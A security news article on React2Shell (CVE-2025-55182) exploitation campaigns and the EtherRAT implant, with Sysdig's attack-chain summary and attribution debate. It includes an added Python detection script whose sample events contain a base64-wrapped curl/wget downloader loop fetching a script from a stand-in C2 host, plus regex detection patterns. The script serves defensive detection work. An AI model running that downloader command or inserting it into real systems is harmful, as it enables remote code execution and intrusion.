React2Shell Exploit Campaigns Tied to North Korean Cyber Tactics

By Team-CWD, December 9, 2025
Security researchers at Sysdig have observed new campaigns exploiting React2Shell that appear to bear the hallmarks of North Korean hackers.

React2Shell is a remote code execution vulnerability in React Server Components (RSCs). Tracked as CVE-2025-55182, the flaw has a maximum severity rating with a CVSS score of 10.0.

Publicly disclosed on December 3, the vulnerability affects version 19 of React, the open source library for building application user interfaces, as well as many related frameworks, including Next.js, Waku, React Router and RedwoodSDK.

Shortly after it was made public, Amazon Web Services (AWS) confirmed that threat groups including Earth Lamia and Jackpot Panda, both linked to Chinese state interests, were among those launching exploitation attempts.

Other threat actors were also observed exploiting React2Shell, including opportunistic actors installing cryptocurrency miners (primarily XMRig) and credential harvesters targeting AWS configuration files and environment variables.

Now, the Sysdig Threat Research Team (TRT) said it had discovered, on a compromised Next.js application, a novel implant that delivers EtherRAT.

The Sysdig TRT’s analysis, published on December 8, reveals significant overlap with tooling from the North Korea-linked campaign cluster dubbed ‘Contagious Interview.’ This suggests either that North Korean actors have pivoted to exploiting React2Shell or that sophisticated tool-sharing is occurring between nation-state groups.

React2Shell-EtherRAT Attack Chain Explained

EtherRAT is a remote access trojan (RAT) that leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms and downloads its own Node.js runtime from nodejs.org.

“Rather than hardcoding a C2 server address, which can be blocked or seized, the malware queries an on-chain contract to retrieve the current C2 URL,” explained the Sysdig report.

The attack chain of the malicious campaign leveraging the React2Shell exploit follows four stages, each designed to establish persistent, evasive control over the compromised system:

  1. Initial Access: A base64-encoded shell command executes via React2Shell, deploying a persistent downloader that fetches a malicious script (s.sh) using curl/wget/python3 fallbacks and a 300-second retry loop
  2. Deployment: The downloaded script (s.sh) installs Node.js from nodejs.org (to avoid detection), creates hidden directories, and drops an encrypted payload and an obfuscated JavaScript dropper, then self-deletes
  3. Dropper: The JavaScript dropper (.kxnzl4mtez.js) decrypts the main payload using AES-256-CBC with hardcoded keys, writes the decrypted implant to disk, and executes it via the downloaded Node.js runtime
  4. Implant: The final payload establishes a persistent backdoor with blockchain-based C2, five redundancy mechanisms for persistence, and automatic payload updates, ensuring long-term access
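As an added illustration, not code from the article or from Sysdig's report, the Python below sketches host-based detection heuristics for the first three stages described above and runs them over constructed process-execution events. The web-server process names, the installer allowlist, the `.invalid` download host and the sample command lines are assumptions; only the hidden-directory/dropper naming and the curl/wget fallback with a 300-second retry loop come from the stages listed above.

```python
import base64
import re

# Heuristics for the React2Shell -> EtherRAT stages above; process names and allowlist are assumed.
WEB_APP_PARENTS = {"next-server", "node"}      # processes serving React Server Components
TRUSTED_INSTALLERS = {"ci-runner"}             # legitimate fetchers of the Node.js runtime
B64_PIPE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash)\b")
FETCHERS = re.compile(r"\b(?:curl|wget|python3)\b")
RETRY_LOOP = re.compile(r"\b(?:while|until)\b.*\bsleep\s+300\b")
NODE_FROM_ORIGIN = re.compile(r"\b(?:curl|wget)\b.*https?://nodejs\.org/dist/")
HIDDEN_JS_DROPPER = re.compile(r"\bnode\b.*/\.[^/\s]+/\.[a-z0-9]{8,}\.js\b")

def decode_b64_stage(cmd):
    """Return the shell text hidden in an 'echo <b64> | base64 -d | sh' wrapper, or None."""
    m = B64_PIPE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None

def classify(event):
    """Return the stage labels a single exec event matches (empty list if nothing fires)."""
    cmd, parent = event["cmd"], event["parent"]
    hits = []
    decoded = decode_b64_stage(cmd)
    if decoded is not None and parent in WEB_APP_PARENTS:       # stage 1: RSC process spawning wrapped shell
        hits.append("stage1:base64-shell-from-web-app")
        if FETCHERS.search(decoded) and RETRY_LOOP.search(decoded):
            hits.append("stage1:downloader-with-300s-retry")
    if NODE_FROM_ORIGIN.search(cmd) and parent not in TRUSTED_INSTALLERS:  # stage 2: runtime fetch
        hits.append("stage2:nodejs-runtime-fetched-outside-allowlist")
    if HIDDEN_JS_DROPPER.search(cmd):                            # stage 3: hidden dir + random-name .js
        hits.append("stage3:hidden-js-dropper-executed")
    return hits

def scan(events):
    labelled = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in labelled if hits]           # only events that fired a rule

# Constructed sample exec events (parent process name + command line), not real telemetry.
_STAGE1_INNER = ("while true; do curl -fsSL http://c2.example.invalid/s.sh -o /tmp/.x/s.sh || "
                 "wget -q -O /tmp/.x/s.sh http://c2.example.invalid/s.sh; [ -s /tmp/.x/s.sh ] && break; sleep 300; done")
SAMPLE_EVENTS = [
    {"parent": "next-server", "cmd": "sh -c 'echo %s | base64 -d | sh'" % base64.b64encode(_STAGE1_INNER.encode()).decode()},
    {"parent": "sh", "cmd": "curl -fsSL https://nodejs.org/dist/vX.Y.Z/node-vX.Y.Z-linux-x64.tar.xz -o /tmp/.x/node.tar.xz"},
    {"parent": "sh", "cmd": "/tmp/.x/node/bin/node /tmp/.x/.kxnzl4mtez.js"},
    {"parent": "ci-runner", "cmd": "curl -fsSL https://nodejs.org/dist/vX.Y.Z/node-vX.Y.Z-linux-x64.tar.xz -o node.tar.xz"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the allowlisted CI download alone; in production the events would come from an exec-auditing source such as auditd or an eBPF-based agent.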

Signs of Nation-State Groups’ Sophistication or Cooperation

These campaigns show similarities to multiple documented campaigns, including North Korean-linked ones.

For instance, the encrypted loader pattern used in these EtherRAT campaigns closely matches the North Korean-affiliated BeaverTail malware used in the Contagious Interview campaigns.

Sysdig noted that Google Threat Intelligence Group (GTIG) recently attributed the use of BeaverTail malware and blockchain-based C2 techniques to the North Korean-associated threat actor UNC5342.

“However, without direct code overlap, we cannot confirm the threat actor behind EtherRAT is the same. Given some of the significant differences listed above, this may represent shared techniques across multiple Democratic People’s Republic of Korea-affiliated (DPRK) threat groups,” the Sysdig researchers wrote.

“Alternatively, while DPRK actors may have adopted React2Shell as a new initial access vector, it’s possible another sophisticated actor may be combining techniques from multiple documented campaigns to complicate attribution,” they added.

If the attribution is confirmed, these new campaigns represent a significant evolution in tradecraft, where North Korean actors trade a smaller payload size for reduced detection risk.

“While Lazarus Group and other North Korean-linked threat actors historically bundle Node.js with their payloads, the sample we identified downloads Node.js from the official nodejs.org distribution,” the researchers explained.

According to Sysdig researchers, EtherRAT marks a “significant evolution in React2Shell exploitation,” shifting away from the typical opportunistic cryptomining and credential theft toward “persistent, stealthy access designed for long-term operations.”

The team highlighted that the malware’s “combination of blockchain-based C2, aggressive multi-vector persistence, and a payload update mechanism” reflects a level of sophistication “not previously observed in React2Shell payloads.” This suggests a more calculated and resilient threat model, they noted.
